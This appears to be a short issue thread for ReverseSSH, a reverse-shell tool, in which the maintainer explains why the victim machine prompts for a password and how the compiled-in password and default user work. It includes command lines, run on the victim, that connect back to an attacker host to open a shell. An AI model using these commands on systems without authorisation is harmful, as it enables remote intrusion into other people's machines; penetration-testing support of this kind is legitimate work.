Victim machine keep asking for password

[nobeltnium]

update: So turn out the password will print out when i invoke command .\reverse-ssh.exe -h (a random string).
This can be change to a custom password in the make file before compiling.

[Fahrj]

Hi @nobeltnium ,

sorry for the late reply, I was abroad the last few weeks.

I get the impression that you already found a solution to your initial question.

To add a little explanation from my current understanding of your problem: when you try to connect from the victim machine to the attacker machine to start the listener there (e.g. with .\reverse-ssh.exe -v 192.168.0.1), ReverseSSH first tries to log in with the same password that it would accept for incoming connections and if that doesn't work it asks for user input.
This password can be set at compile time and you can see it in the help/usage page (with -h flag).

The intention behind this behavior is that if you are catching the connection attempt with another instance of ReverseSSH, the passwords match and the ListenRequest is granted without further interaction.

Additionally, one should bear in mind that by default ReverseSSH tries to authenticate as user reverse if none is supplied. To change this, adapt the command on the victim like this: .\reverse-ssh.exe -v myuser@192.168.0.1 .

I would close this issue in a few days unless you have further questions.